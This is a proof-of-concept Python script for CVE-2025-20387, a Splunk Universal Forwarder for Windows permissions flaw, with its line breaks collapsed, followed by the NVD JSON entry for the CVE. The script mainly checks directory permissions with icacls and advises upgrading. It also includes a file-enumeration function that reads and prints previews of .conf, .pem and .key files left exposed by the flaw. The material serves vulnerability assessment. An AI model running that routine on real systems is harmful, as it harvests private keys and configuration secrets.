CVE-2025-20387

# CVE-2025-20387 PoC - Check Splunk Universal Forwarder Directory Permissions # This PoC demonstrates the incorrect permissions assignment vulnerability # Usage: Run with low-privilege user account on Windows with Splunk UF installed import os import subprocess import re def check_splunk_permissions(): """Check if Splunk Universal Forwarder directory has incorrect permissions""" # Common Splunk UF installation paths potential_paths = [ r"C:\Program Files\SplunkUniversalForwarder", r"C:\Program Files (x86)\SplunkUniversalForwarder", r"C:\SplunkUniversalForwarder" ] vulnerable = False for path in potential_paths: if os.path.exists(path): print(f"[+] Found Splunk UF installation at: {path}") # Use icacls to check permissions try: result = subprocess.run( ['icacls', path], capture_output=True, text=True ) print(f"\n[+] Current permissions for {path}:") print(result.stdout) # Check for overly permissive settings if 'Users:(F)' in result.stdout or 'Users:(I)(F)' in result.stdout: print(f"[!] VULNERABLE: Users group has Full Control (F) permissions!") print("[!] Non-admin users can read/write all files in the directory") vulnerable = True elif 'Everyone:' in result.stdout: print(f"[!] VULNERABLE: Everyone group has access permissions!") vulnerable = True else: print(f"[+] Permissions appear to be properly configured") except Exception as e: print(f"[-] Error checking permissions: {e}") return vulnerable def enumerate_sensitive_files(path): """Enumerate potentially sensitive files accessible due to incorrect permissions""" sensitive_patterns = [ '*.conf', '*.pem', '*.key', '*.txt', '*.log' ] print(f"\n[+] Enumerating sensitive files in {path}...") for root, dirs, files in os.walk(path): for file in files: if any(pattern.replace('*', '') in file.lower() for pattern in sensitive_patterns): filepath = os.path.join(root, file) try: # Attempt to read the file with open(filepath, 'r', encoding='utf-8', errors='ignore') as f: content = f.read(500) # Read first 500 chars print(f"\n[+] Accessible file: {filepath}") print(f"Content preview: {content[:200]}...") except PermissionError: print(f"[-] Cannot read (permission denied): {filepath}") except Exception as e: pass if __name__ == '__main__': print("=" * 60) print("CVE-2025-20387 Splunk UF Permissions Check") print("=" * 60) if check_splunk_permissions(): print("\n[!] System is VULNERABLE to CVE-2025-20387") print("[!] Recommendation: Upgrade Splunk UF to patched version") else: print("\n[+] System does not appear to be vulnerable")

{"cve": {"id": "CVE-2025-20387", "sourceIdentifier": "[email protected]", "published": "2025-12-03T17:15:51.257", "lastModified": "2025-12-05T17:35:09.560", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Splunk Universal Forwarder for Windows versions below 10.0.2, 9.4.6, 9.3.8, and 9.2.10, a new installation of or an upgrade to an affected version can result in incorrect permissions assignment in the Universal Forwarder for Windows Installation directory. This lets non-administrator users on the machine access the directory and all its contents."}, {"lang": "es", "value": "En las versiones de Splunk Universal Forwarder para Windows inferiores a 10.0.2, 9.4.6, 9.3.8 y 9.2.10, una nueva instalación o una actualización a una versión afectada puede resultar en una asignación incorrecta de permisos en el directorio de instalación del Universal Forwarder para Windows. Esto permite a los usuarios no administradores en la máquina acceder al directorio y a todo su contenido."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-732"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.2.0", "versionEndExcluding": "9.2.10", "matchCriteriaId": "AE8BF109-2B9C-4C50-AC9F-10A45456FD75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.3.0", "versionEndExcluding": "9.3.8", "matchCriteriaId": "05D6973D-D965-42D3-8320-AF4A4B424E6C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.4.0", "versionEndExcluding": "9.4.6", "matchCriteriaId": "8571F470-6AE1-4737-B1FA-49121E426AF2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.0.0", "versionEndExcluding": "10.0.2", "matchCriteriaId": "4413D4BE-F225-4C28-B401-EB46D8F34160"}]}]}], "references": [{"url": "https://advisory.splunk.com/advisories/SVD-2025-1206", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}